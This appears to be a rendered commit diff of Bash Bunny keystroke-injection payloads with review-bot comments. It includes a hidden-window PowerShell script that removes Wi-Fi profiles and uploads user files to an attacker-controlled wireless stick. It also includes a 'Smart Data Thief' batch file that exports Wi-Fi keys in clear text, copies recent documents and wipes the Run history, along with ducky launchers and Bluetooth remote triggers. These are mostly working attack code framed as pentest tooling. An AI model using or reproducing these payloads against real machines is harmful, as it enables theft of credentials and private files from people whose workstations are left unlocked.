$etw_provider.SetValue($null, $event_provider)
|
||||
|
||||
# Hide "PowerShell" window.
|
||||
#
|
||||
$Script:showWindowAsync = Add-Type -MemberDefinition @"
|
||||
[DllImport("user32.dll")]
|
||||
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
|
||||
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
|
||||
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
|
||||
|
||||
If ($SSID -And $PSK -And $LOOT -And $DIRECTORY -And $EXTENSION) {
|
||||
|
||||
# Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
|
||||
#
|
||||
$interface_guid = (Get-NetAdapter -Physical -Name "Wi-Fi" | WHERE Status -eq "Up").InterfaceGuid
|
||||
If ($interface_guid) {
|
||||
$wlan_service_path = "C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\${interface_guid}\"
|
||||
$wlan_service_items = Get-ChildItem -Path $wlan_service_path -Recurse
|
||||
$wlan_service_items | ForEach-Object {
|
||||
[xml] $xml_content = Get-Content -Path $_.FullName
|
||||
$mode = $xml_content.WLANProfile.connectionMode
|
||||
$name = $xml_content.WLANProfile.name
|
||||
If ($mode -eq "auto") {
|
||||
(NETSH WLAN DELETE PROFILE name="$name") | Out-Null
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
# Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
|
||||
#
|
||||
$profile_guid = "{" + [guid]::NewGuid().ToString() + "}"
|
||||
$profile_path = "${env:TEMP}\${profile_guid}.xml"
|
||||
$ssid_hex = ($SSID.ToCharArray() | ForEach-Object { [System.String]::Format("{0:X}", [System.Convert]::ToUInt32($_)) })
|
||||
@"
|
||||
<?xml version="1.0"?>
|
||||
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
|
||||
<name>${SSID}</name>
|
||||
<SSIDConfig>
|
||||
<SSID>
|
||||
<hex>${ssid_hex}</hex>
|
||||
<name>${SSID}</name>
|
||||
</SSID>
|
||||
</SSIDConfig>
|
||||
<connectionType>ESS</connectionType>
|
||||
<connectionMode>auto</connectionMode>
|
||||
<MSM>
|
||||
<security>
|
||||
<authEncryption>
|
||||
<authentication>WPA2PSK</authentication>
|
||||
<encryption>AES</encryption>
|
||||
<useOneX>false</useOneX>
|
||||
</authEncryption>
|
||||
<sharedKey>
|
||||
<keyType>passPhrase</keyType>
|
||||
<protected>false</protected>
|
||||
<keyMaterial>${PSK}</keyMaterial>
|
||||
</sharedKey>
|
||||
</security>
|
||||
</MSM>
|
||||
<MacRandomization xmlns="http://www.microsoft.com/networking/WLAN/profile/v3">
|
||||
<enableRandomization>false</enableRandomization>
|
||||
</MacRandomization>
|
||||
</WLANProfile>
|
||||
"@ | Out-File -FilePath "${profile_path}"
|
||||
|
||||
(NETSH WLAN ADD PROFILE filename="${profile_path}") | Out-Null
|
||||
Remove-Item -Path "${profile_path}" -Force
|
||||
|
||||
# Checks whether the Wi-Fi interface is connected to the "SanDisk".
|
||||
# Whether the gateway can be reached.
|
||||
# If not, automatically starts again.
|
||||
#
|
||||
While ($TRUE) {
|
||||
$ConnectionError = $NULL
|
||||
Try {
|
||||
(NETSH WLAN CONNECT name="$SSID") | Out-Null
|
||||
$wifi_connected = (Get-NetConnectionProfile).Name
|
||||
$gateway_address = (Get-NetRoute -DestinationPrefix 0.0.0.0/0 | Select-Object -ExpandProperty NextHop)
|
||||
$gateway_reachable = (Test-Connection -ComputerName $gateway_address -Quiet)
|
||||
If ($wifi_connected -eq $SSID -And $gateway_reachable) {
|
||||
Break
|
||||
}
|
||||
} Catch {
|
||||
$ConnectionError = $_
|
||||
Start-Sleep -Seconds 8
|
||||
}
|
||||
}
|
||||
|
||||
#
|
||||
# Exfiltration of the files via the HTTP channel.
|
||||
#
|
||||
|
||||
Function Invoke-CustomRequest($Url, $Method) {
|
||||
$RequestError = $NULL
|
||||
Try {
|
||||
$request = [System.Net.WebRequest]::Create($Url)
|
||||
$request.Method = $Method
|
||||
$request.GetResponse().Close()
|
||||
} Catch {
|
||||
$RequestError = $_
|
||||
return $FALSE
|
||||
}
|
||||
return $TRUE
|
||||
}
|
||||
|
||||
Function Invoke-UploadRequest($Url, $File) {
|
||||
$RestError = $NULL
|
||||
Try {
|
||||
$empty = [String]::IsNullOrWhiteSpace((Get-Content -Path $File))
|
||||
If (!$empty) {
|
||||
Invoke-RestMethod -Uri $Url -Method PUT -InFile $File
|
||||
}
|
||||
} Catch {
|
||||
$RestError = $_
|
||||
}
|
||||
}
|
||||
|
||||
Function Exfiltration-Files($Directory, $Extension, $Url) {
|
||||
$files = Get-ChildItem -Path $Directory -Include ($Extension.split(",")) -Recurse
|
||||
ForEach ($file in $files) {
|
||||
$random = ( -join ( (0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_} ) )
|
||||
$basename = Split-Path -Path "${file}" -Leaf -Resolve
|
||||
Invoke-UploadRequest -Url "${Url}${random}-${basename}" -File "${file}" | Out-Null
|
||||
}
|
||||
}
|
||||
|
||||
$sandisk_loot = "http://${gateway_address}/myconnect/${LOOT}/"
|
||||
|
||||
$check_loot = Invoke-CustomRequest -Url $sandisk_loot -Method "GET"
|
||||
If ($check_loot) {
|
||||
Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
|
||||
} Else {
|
||||
Invoke-CustomRequest -Url $sandisk_loot -Method "MKCOL" | Out-Null
|
||||
Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
|
||||
}
|
||||
|
||||
# Cleanup
|
||||
#
|
||||
(NETSH WLAN DELETE PROFILE name="$SSID") | Out-Null
|
||||
Exit
|
||||
|
||||
}
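Review bot: `$ConnectionError`, `$RequestError` and `$RestError` are initialised to `$NULL` and reassigned from `$_` inside the `Catch` blocks, but nothing reads them afterwards, so they are dead stores and can be removed (leaving the `Catch` bodies with the `return $FALSE` / `Start-Sleep -Seconds 8` they actually perform). `Exfiltration-Files` does not follow PowerShell's approved verb-noun naming, and none of the three functions carries comment-based help describing its parameters.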
|
|
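--- /dev/null
+++ b/[path-not-on-page]/payload.txt
@@ -0,0 +1,74 @@
+#!/bin/bash
+#
+# Title: SanDisk Wireless Stick Exfiltration
+#
+# Description: Files Exfiltration with "SanDisk Wireless Stick"
+#
+# Author: TW-D
+# Version: 1.0
+# Category: Exfiltration
+# Target: Microsoft Windows 10
+# Attackmodes: HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 1903 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# REQUIREMENTS
+# ===============
+# SanDisk Wireless Stick 16Go/32Go - Firmware 4.1.0 (2050)
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+readonly SANDISK_SSID="HAK5-EXFIL"
+readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
+readonly SANDISK_LOOT="loots"
+readonly USER_DIRECTORY="~\\"
+readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+######## ATTACK ########
+
+LED ATTACK
+
+RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 5000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 3500
+Q STRING "CD \"\${BB_VOLUME}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING ".\payload.ps1 -SSID \"${SANDISK_SSID}\" -PSK \"${SANDISK_PSK}\" -LOOT \"${SANDISK_LOOT}\" -DIRECTORY \"${USER_DIRECTORY}\" -EXTENSION \"${FILE_EXTENSION}\""
+Q ENTER
+Q DELAY 1500
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0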
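--- /dev/null
+++ b/[path-not-on-page]/payload.txt
@@ -0,0 +1,109 @@
+# Title: Smart Data Thief
+# Description: Exfiltrates high value files from documents / desktop, gets all WiFi keys, shuts down after configurable
+# time, may be triggered to start and / or stop by BLE, offers optional distraction on shutdown
+# Author: saintcrossbow
+# Props: Hak5Darren
+# Version: 1.0
+# Category: Exfiltration
+# Target: Windows 10 with minimum powershell usage
+# Attackmodes: HID, Storage
+
+# Full Description
+# ----------------
+# The perfect versatile data thief with multiple configurations to tailor attacks towards an engagement. Attack is timed
+# so you'll know exactly how much time you have with each target. See the configuraton section for modifications.
+#
+# Payload targets the following from the workstation:
+# - All WiFi creds
+# - The past 30 days in both Desktop and Documents
+# - All Word docs, Excel spreadsheets, loose email files (*.msg), text files, and OneNote notebooks
+#
+# * Note: All bluetooth monitoring based on Hak5Darren's methods already present on the Bash Bunny
+
+# Files
+# -----
+# - payload.txt: Starts and monitors the attack. All configuration contained in this file.
+# - verify.bat: Run the file exfiltration. You may configure the target files in this batch file. Of course, it really doesn't
+# verify anything – it is just called that because it is "in disguise"
+
+# Setup
+# -----
+# - Place the payload.txt and verify.bat on either switch directory
+# - If you are using a SD card, copy verify.bat under /payloads/switchn/ (where n is the switch you are running)
+# - Good idea to have the Bash Bunny ready to copy to either the device or SD for maximum versatility
+
+# LEDs
+# ----
+# Magenta: Initial setup – about 1 – 3 seconds
+# Slow 1 second yellow on and off: Waiting for start mission trigger by BLE
+# Single yellow blink: Attack in progress
+# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed
+
+# Options
+# -------
+# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
+BB_NAME="BashBunny"
+# Total time allocated for the attack, after which the Bash Bunny will shutdown
+EJECT_TIME=30
+# BLE ID to stop attack immediately and go to shutdown
+ABORT_MISSION="QSTOP"
+# Flash a bunch of windows and lock PC if ABORT mission received
+DISTRACT_ON_ABORT=false
+# Do we wait for a start trigger? And what is it?
+WAIT_FOR_TRIGGER=false
+START_MISSION="QSTART"
+
+# Setup
+# -----
+LED SETUP
+
+# Start bluetooth for observation
+source bunny_helpers.sh
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+sleep 1
+echo -n -e "AT+ROLE=2" > /dev/ttyS1
+echo -n -e "AT+RESET" > /dev/ttyS1
+
+# Wait for "button job" if desired
+if $WAIT_FOR_TRIGGER; then
+CUCUMBER ENABLE
+LED Y SLOW
+WAIT_FOR_PRESENT $START_MISSION
+fi
+
+# Attack
+# ------
+CUCUMBER DISABLE
+ATTACKMODE HID STORAGE
+Q DELAY 1000
+LED ATTACK
+Q DELAY 100
+Q GUI r
+Q DELAY 100
+
+Q STRING cmd.exe /c start /min powershell ".((gwmi win32_volume -f 'label=''$BB_NAME''').Name+'payloads\\$SWITCH_POSITION\verify.bat')"
+Q ENTER
+
+# Variation on the WAIT_FOR_PRESENT method so we can delay as well as observe BLE
+for (( c=1; c<=$EJECT_TIME; c++ ))
+do
+timeout 1s cat /dev/ttyS1 > /tmp/bt_observation
+if grep -ao $ABORT_MISSION /tmp/bt_observation; then
+if $DISTRACT_ON_ABORT; then
+for i in {1..5}
+do
+Q GUI d
+Q DELAY 200
+done
+Q GUI l
+fi
+break
+fi
+done
+
+sync
+LED FINISH
+Q DELAY 1500
+shutdown now
+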
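Review bot: The abort check `if grep -ao $ABORT_MISSION /tmp/bt_observation; then` lets grep echo the matched beacon to stdout on every hit and expands the beacon unquoted; the BlueTooth2 payload added in this same commit uses `grep -qao`, so the two should agree: `if grep -qao "$ABORT_MISSION" /tmp/bt_observation; then`. The `stty -F /dev/ttyS1 ...` line is issued twice back to back with identical arguments — if the repetition is deliberate, a one-line comment saying why would save the next reader a question; otherwise drop one. The loop body's original indentation is not visible on this rendered page.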
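--- /dev/null
+++ b/[path-not-on-page]/README.md
@@ -0,0 +1,54 @@
+## Smart Data Thief
+
+Make your Bash Bunny into the perfect data thief. This payload is ideal for demonstrating the need to lock workstations: using it, you can stroll through a facility and steal critical information from PC after PC. The attack is highly configurable with the following options:
+
+- Copies are timed to be as fast or as long as you want. You’ll know
+exactly how long you have per workstation, and also know you can
+remove the Bash Bunny safely once it the time expires
+- The copy may be configured to stop when a secret BLE beacon is sent –
+the Bash Bunny will shut down for immediate removal.
+- Concerned that someone might see the attack? Configure the payload to
+flash windows and suddenly lock before shutting down the Bash Bunny,
+which gives the payload time to clean up its tracks while you make
+appropriate excuses.
+- Want to trigger the payload from afar? Make the attack a “button job”
+– the Bash Bunny will take advantage of Cool Cucumber CPU usage while
+waiting for the secret BLE beacon.
+
+The payload may be used with or without a SD card and places loot in a folder with the computer’s name. Additionally it targets the most likely high-value targets on a workstation, and only those that have been updated in past 30 days – however feel free to tailor parameters to your unique pentest situation.
+
+**Targets**
+
+1. All WiFi creds used by the workstation
+2. The past 30 days in both Desktop and Documents for:
+- Word docs
+- Excel spreadsheets
+- Loose email files (*.msg)
+- Text files
+- OneNote notebooks
+
+**Files Used**
+
+- payload.txt: Starts and monitors the attack. All configuration constants are contained in this file.
+- verify.bat: Runs the file exfiltration. You may configure the target files in this batch file. Of course, it really doesn't verify anything – it is just called that because it is "in disguise"
+
+**Setup**
+1. Place the payload.txt and verify.bat on either switch directory
+2. If you are using a SD card, copy verify.bat to /payloads/switch*n*/ (where *n* is the switch you are running)
+3. For maximum versatility, place verify.bat in both locations
+
+**Payload Configuration**
+
+Change any of the constants below to match your mission parameters:
+- BB_NAME: Make sure you have the right Bash Bunny name in this constant
+- EJECT_TIME: Total time allocated for the attack, after which the Bash Bunny will shutdown
+- ABORT_MISSION: Specify what BLE beacon will stop the attack - the payload will check every second for the beacon
+- DISTRACT_ON_ABORT: If the payload is stopped by the BLE beacon, it will also flash a bunch of windows and lock the PC before shutting down to cause a distraction.
+- WAIT_FOR_TRIGGER: Don’t start the attack immediately but wait for the BLE beacon.
+- START_MISSION: The BLE beacon that will remotely start the attack. Make sure WAIT_FOR_TRIGGER is set to true.
+
+**LED meanings**
+- Magenta: Initial setup – about 1 – 3 seconds
+- Slow 1 second yellow on and off: Waiting for start mission trigger to be sent by BLE
+- Single yellow blink: Attack in progress
+- Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed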
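--- /dev/null
+++ b/[path-not-on-page]/verify.bat
@@ -0,0 +1,14 @@
+@echo off
+cd /d %~dp0
+mkdir \loot\WiFiCreds\%COMPUTERNAME%
+cd \loot\WiFiCreds\%COMPUTERNAME%
+netsh wlan export profile key=clear
+timeout 1
+mkdir \loot\DriveLast30\%COMPUTERNAME%
+cd \loot\DriveLast30\%COMPUTERNAME%
+robocopy %userprofile%\Documents\ . *.doc* *.xls* *.msg *.txt *.one /S /J /MT /MAXAGE:30 /MAX:4000000 /R:0 /np /nfl
+robocopy %userprofile%\Desktop\ . *.doc* *.xls* *.msg *.txt *.one /S /J /MT /MAXAGE:30 /MAX:4000000 /R:0 /np /nfl
+
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+timeout 1
+exit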
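Review bot: `netsh wlan export profile key=clear` writes every saved Wi-Fi profile with its PSK in plaintext under `\loot\WiFiCreds\%COMPUTERNAME%` on the device storage, and neither this file nor the payload header says so; the header in payload.txt should state that the loot (plaintext keys plus copied documents) sits unencrypted on removable media, so it has to be handled and destroyed under the engagement's data-handling rules. The `REG DELETE ... RunMRU /f` line has no explanation at all; a `REM` comment naming what it removes would keep a reviewer from having to look it up. The two `robocopy` lines repeat the same option set, so a `REM same filter as Documents above` on the second would make clear that the two are meant to stay in sync.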
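--- /dev/null
+++ b/[path-not-on-page]/payload.txt
@@ -0,0 +1,22 @@
+# Title: Read It Out
+# Description: Gets the Microsoft Speech API (SAPI) to read out the content of text files in the MyDocuments directory.
+# Author: Cribbit
+# Version: 1.0
+# Category: Exfiltration
+# Target: Windows (Powershell 5.1+)
+# Attackmodes: HID
+# Extensions: Run
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID
+
+QUACK DELAY 500
+
+LED ATTACK
+
+RUN WIN "powershell -Noni -NoP -W h -C \"& {\$s=New-Object -ComObject SAPI.SPVoice; gci([Environment]::GetFolderPath('MyDocuments')) -file *.txt | % {\$s.Speak(\$(gc(\$_.FullName)))}}\""
+
+LED FINISH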
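--- /dev/null
+++ b/[path-not-on-page]/README.md
@@ -0,0 +1,27 @@
+# Read It Out
+- Author: Cribbit
+- Version: 1.0
+- Target: Windows 10 (Powershell 5.1+)
+- Category: Exfiltration
+- Attackmode: HID
+- Extensions: Run
+
+## Change Log
+| Version | Changes |
+| ------- | --------------- |
+| 1.0 | Initial release |
+
+## Description
+Super subtle exfiltration method.
+
+Gets the Microsoft Speech API (SAPI) to read out the content of text files in the MyDocuments directory.
+
+## Config
+Add -r to do subdirectorys
+
+## Colours
+| Status | Colour | Description |
+| ------ | ----------------------------- | --------------------------- |
+| SETUP | Magenta solid | Setting attack mode |
+| ATTACK | Yellow single blink | Injecting Powershell script |
+| FINISH | Green blink followed by SOLID | Script is finished |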
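--- /dev/null
+++ b/[path-not-on-page]/README.md
@@ -0,0 +1,23 @@
+# BlueTooth2
+
+BlueTooth2 is a program that scans for two bluetooth devices and depending on what one it finds it runs whatever.
+
+## What it Does and How its Different
+
+Unlike the standard WAIT_FOR_PRESENT that scans for one device and doesnt allow code after it to run until found.
+This will do a scan and then check for two different devices names allowing for multiple remote triggers that
+can do different things.
+
+## Note
+
+I imagine your looking at this code and wondering what idiot wrote it and I would very cool if you would
+make it more efficient or even pretty. It worked when I tested it (I use BLE Tool)
+
+## LED
+
+| COLOR | DESCRIPTION |
+|---------|-------------|
+| White | Scan |
+| Yellow | Checking |
+| Green | Attack1 |
+| Blue | Attack2 |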
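--- /dev/null
+++ b/[path-not-on-page]/payload.txt
@@ -0,0 +1,76 @@
+#!/bin/bash
+#
+# Title: BlueTooth2
+# Description: multiple remote triggers
+# Author: JustaProgrammer9
+# Category: General
+# Target: Windows
+# Attackmodes: HID
+# Suggestion: Use BLE Tool if triggers take to long
+#
+
+#--// Function \\--#
+WAIT_FOR_BLUETOOTH() {
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+sleep 1
+echo -n -e "AT+ROLE=2" > /dev/ttyS1
+echo -n -e "AT+RESET" > /dev/ttyS1
+timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
+}
+#------------------#
+
+
+#--// Setup/Config \\--#
+ATTACKMODE HID
+
+device="notepad"
+
+otherdevice="attack"
+#----------------------#
+
+
+#--// Check for devices \\--#
+while true; do
+LED W
+WAIT_FOR_BLUETOOTH
+LED Y
+
+if grep -qao $device /tmp/bt_observation; then
+if1="true"
+break
+
+sleep 1
+
+elif grep -qao $otherdevice /tmp/bt_observation; then
+if2="true"
+break
+
+sleep 1
+
+#add more if's for more bluetooth devices to look for
+
+fi
+done
+#---------------------------#
+
+
+#--// Your attacks \\--#
+if [ $if1 = "true" ]; then
+LED G
+Q GUI r
+Q DELAY 100
+Q STRING "notepad"
+Q ENTER
+Q DELAY 200
+Q STRING "Hak5 rules"
+Q ENTER
+
+elif [ $if2 = "true" ]; then
+LED B
+# do something cool here
+
+else
+LED R
+
+fi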
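Review bot: `if [ $if1 = "true" ]; then` runs with `if1` unset whenever the `otherdevice` branch fired, because the loop only ever assigns one of the two variables, so `[` sees `[ = true ]`, prints "unary operator expected" and only then falls through to the `elif`; initialise both in the Setup/Config block (`if1="false"` and `if2="false"`) and quote the expansions, `if [ "$if1" = "true" ]; then` / `elif [ "$if2" = "true" ]; then`. The `sleep 1` after each `break` is unreachable and can be dropped. `grep -qao $device` and `grep -qao $otherdevice` should quote their arguments as well, since an unquoted value containing whitespace is split into a pattern plus extra file names. The original indentation is not visible on this rendered page.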
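--- /dev/null
+++ b/[path-not-on-page]/UIBEX.py
@@ -0,0 +1,92 @@
+#!/bin/python2
+from __future__ import absolute_import
+import sys
+import datetime
+import base64
+import binascii
+import struct
+import time
+from io import open
+try:
+try:
+LogFile = open(u"./UIBEX_ExtractionLog.txt", u"x")
+except FileExistsError:
+LogFile = open(u"./UIBEX_ExtractionLog.txt", u"a")
+except NameError:
+try:
+LogFile = open(u"./UIBEX_ExtractionLog.txt", u"a")
+except OSError:
+LogFile = open(u"./UIBEX_ExtractionLog.txt", u"w")
+
+
+if len(sys.argv) != 2:
+sys.stdout.write(u"Usage: {a} <Ubootimage/Block device containing image>\n".format(a=sys.argv[0]))
+sys.exit(1)
+
+
+LogFile.write(u"[{a}]: Opening file {b} for reading...\n".format(a=datetime.datetime.utcnow(),b=sys.argv[1]))
+try:
+InFileHan = open(sys.argv[1],u"rb")
+except OSError as E:
+LogFile.write(u"[{a}]: Error. {E}\n".format(a=datetime.datetime.utcnow(),E=str(E)))
+sys.exit(1)
+LogFile.write(u"[{a}]: File open. Loading header....\n".format(a=datetime.datetime.utcnow()))
+InHeader = InFileHan.read(64)
+LogFile.write(u"[{a}]: Header loaded. Checking Magic.\n".format(a=datetime.datetime.utcnow()))
+try:
+assert InHeader[0:4:] == "'\x05\x19V"
+except AssertionError:
+LogFile.write(u"[{a}]: Assertion failed, magic is not correct.\n".format(a=datetime.datetime.utcnow()))
+sys.exit(1)
+LogFile.write(u"[{a}]: Magic verified.\n".format(a=datetime.datetime.utcnow()))
+InHedC = InHeader + "1"
+InHedC = InHedC[0:64:]
+# Blanking CRC.
+InHedC = InHedC[0:4:] + "\x00\x00\x00\x00" + InHedC[8::]
+# Verify CRC.
+HeaderCRC = struct.pack(">i",binascii.crc32(InHedC))
+try:
+assert HeaderCRC == InHeader[4:8:]
+except AssertionError:
+LogFile.write(u"[{a}]: Assertion failed, CRC fail to verify. Calculated CRC: {b} Stored CRC: {c}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(HeaderCRC),c=base64.b16encode(InHeader[4:8:])))
+sys.exit(1)
+LogFile.write(u"[{a}]: Header CRC: {b}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(HeaderCRC)))
+LogFile.write(u"[{a}]: Searching for uImage data.\n".format(a=datetime.datetime.utcnow()))
+# Grab length and verify data.
+ImageLength = struct.unpack(">i",InHeader[12:16])[0]
+ImageData = InFileHan.read(ImageLength)
+LogFile.write(u"[{a}]: uImage data loaded.\n".format(a=datetime.datetime.utcnow()))
+# Verify CRC.
+DataCRC = struct.pack(">i",binascii.crc32(ImageData))
+try:
+assert DataCRC == InHeader[24:28:]
+except AssertionError:
+LogFile.write(u"[{a}]: Assertion failed, CRC fail to verify. Calculated CRC: {b} Stored CRC: {c}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(DataCRC),c=base64.b16encode(InHeader[24:28:])))
+sys.exit(1)
+LogFile.write(u"[{a}]: Data CRC: {b}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(DataCRC)))
+LogFile.write(u"[{a}]: Both CRC's have been verified. Extraction complete.\n".format(a=datetime.datetime.utcnow()))
+LogFile.write(u"[{a}]: Here is header information:\n".format(a=datetime.datetime.utcnow()))
+HeaderDataT = [
+(u"Image Header Magic Number",base64.b16encode(InHeader[0:4]).decode()),
+(u"Image Header CRC Checksum",base64.b16encode(InHeader[4:8]).decode()),
+(u"Image Creation Timestamp",base64.b16encode(InHeader[8:12]).decode()),
+(u"Image Data Size",base64.b16encode(InHeader[12:16]).decode()),
+(u"Data Load Address",base64.b16encode(InHeader[16:20]).decode()),
+(u"Entry Point Address",base64.b16encode(InHeader[20:24]).decode()),
+(u"Image Data CRC Checksum",base64.b16encode(InHeader[24:28]).decode()),
+(u"Operating System",ord(InHeader[28])),
+(u"CPU architecture",ord(InHeader[29])),
+(u"Image Type",ord(InHeader[30])),
+(u"Compression Type",ord(InHeader[31])),
+(u"Image Name",InHeader[32::].split("\x00")[0].decode())
+]
+for x in HeaderDataT:
+LogFile.write(u"{x0}: {x1}\n".format(x0=x[0],x1=x[1]))
+OutFileName = "./uImage-{a}.img".format(a=int(time.time()//1))
+LogFile.write(u"[{a}]: Writing image to {OutFileName}\n".format(a=datetime.datetime.utcnow(),OutFileName=OutFileName))
+OutFileHan = open(OutFileName,u"wb")
+OutBytes = OutFileHan.write(InHeader + ImageData)
+LogFile.write(u"[{a}]: Written {OutBytes} bytes.\n".format(a=datetime.datetime.utcnow(),OutBytes=OutBytes))
+LogFile.write(u"[{a}]: -------------------------------------------------------\n".format(a=datetime.datetime.utcnow()))
+LogFile.close()
+sys.exit(0)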
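Review bot: The three `assert` statements that validate the magic, the header CRC and the data CRC are removed when the script is run with `python2 -O`, so the `except AssertionError:` branches never fire and an image that fails verification is still written out and logged as verified; use explicit comparisons, e.g. `if InHeader[0:4:] != "'\x05\x19V":` with the same log-and-exit body, and likewise `if HeaderCRC != InHeader[4:8:]:` and `if DataCRC != InHeader[24:28:]:`. `InFileHan.read(64)` is never checked for length: a short read gives a header under 64 bytes, which the `InHeader + "1"` / `[0:64:]` sequence pads rather than rejects, so a `len(InHeader) != 64` check belongs before the magic test. The script also depends on Python 2 semantics — `binascii.crc32` returning a value the `">i"` pack accepts, and `str` slices comparing against the byte-string literals — which the `#!/bin/python2` shebang enforces but a header comment should spell out. `InFileHan` and `OutFileHan` are never closed on any path; a `with` block for each would fix that, and the original indentation is not visible on this rendered page.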
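--- /dev/null
+++ b/[path-not-on-page]/payload.txt
@@ -0,0 +1,156 @@
+#!/bin/bash
+#
+# Title: FICBunny
+# Description: Firmware Image Creator for the Bash Bunny
+# Author: HSF3232
+# Version: 1.0
+# Last tested Bunny Firmware version: 1.7
+#
+# LED STATUS
+# Slow blinking Red - Failed to get the script. Please check that "UIBEX.py" exists within the payload directory.
+# Solid Magenta - Setup in progress...
+# Single blinking Yellow - STAGE 1
+# Double blinking Yellow - STAGE 2
+# Triple blinking Yellow - STAGE 3
+# Quadruple blinking Yellow - STAGE 4
+# Solid Red (After STAGE 4) - Firmware image is missing. If WriteToRecovery is on, will copy the missing firmware image to recovery.
+# Quadruple blinking Cyan (After STAGE 4) - Firmware image exists. If Overwrite and WriteToRecovery are on, will replace the firmware image.
+# Very fast Blinking Magenta - I am writing to the recovery partition, DO NOT UNPLUG!
+
+
+########
+# VARS #
+########
+# WriteToRecovery - When firmware image extraction is complete, write the firmware image to recovery?
+WriteToRecovery=1
+
+# Overwrite - If an existing firmware file is detected within recovery, overwrite it?
+Overwrite=0
+
+#################################
+# DO NOT TOUCH BELOW THIS LINE! #
+#################################
+
+GET SWITCH_POSITION
+###############
+# SETUP Stage.#
+###############
+# Setup stage will force turn off ATTACKMODE to allow access to storage, then we will copy the required script and make the necessary directories.
+ATTACKMODE OFF # Enforce no access to storage. Once execution is complete, we will turn ATTACKMODE to SERIAL STORAGE.
+LED SETUP
+mount /dev/nandf /root/udisk # Ensure udisk is avalible to copy our UIBEX script.
+switchPOS=$SWITCH_POSITION
+if [ ! -e /root/udisk/payloads/$switchPOS/UIBEX.py ]; then # Needed uImage extraction script wasn't found...
+LED FAIL
+exit 1
+fi
+mkdir /tmp/rootexfs # Temporary directory for holding blank system folders and the UIBEX.py script.
+mkdir /tmp/massdisk # /dev/nandf OR /dev/mmcblk0p1. We will copy our completed firmware image here for later keeping.
+# Since we're executing this script from /tmp, we can unmount udisk once we're ready.
+mkdir /tmp/recdisk # /dev/nandg. We will be copying our completed firmware image here once done to re-enable recovery.
+mkdir /tmp/cachedisk # /dev/nandh. We will need this to store our large temporary files.
+cp /root/udisk/payloads/$switchPOS/UIBEX.py /tmp/rootexfs # Copy the required script.
+sleep 1 # Safety net, copying the file over.
+umount /root/udisk # We're finished here.
+cd /tmp/rootexfs # Using CD to change our working directory to rootexfs so we can execute UIBEX.py.
+mkdir media mnt proc sys tmp # Make blank directories - We will use this later for creating rootfs.tar
+chmod 555 proc sys # dr-xr-xr-x
+chmod 777 tmp # drwxrwxrwx
+# Mounting required partitions.
+if [ -b /dev/mmcblk0p1 ]; then # If we have the SD card available to us, mount it.
+mount /dev/mmcblk0p1 /tmp/massdisk
+else
+mount /dev/nandf /tmp/massdisk
+fi
+mount /dev/nandg /tmp/recdisk # Make recovery disk mount point.
+mount /dev/nandh /tmp/cachedisk # Make cache disk mount point.
+mkdir /tmp/cachedisk/upgrade # Make upgrade directory - we will place rootfs and uImage in here.
+mkdir -p /tmp/massdisk/loot/recscript # Make storage location for output of all script related content.
+
+###########
+# STAGE 1 #
+###########
+# Extract the uImage file.
+LED STAGE1
+sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
+python2 UIBEX.py /dev/nandc # Execute uImage extraction script.
+mv uImage*.img /tmp/cachedisk/upgrade/uImage # move uImage to the upgrade folder
+md5sum /tmp/cachedisk/upgrade/uImage > /tmp/cachedisk/upgrade/uImage.md5 # Calculate MD5, save to upgrade folder.
+mv UIBEX_ExtractionLog.txt /tmp/massdisk/loot/recscript/ # Move the extraction log to output folder.
+# UIBEX complete.
+
+###########
+# STAGE 2 #
+###########
+# Copy all system directories into rootfs.tar
+LED STAGE2
+sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for the user interface.
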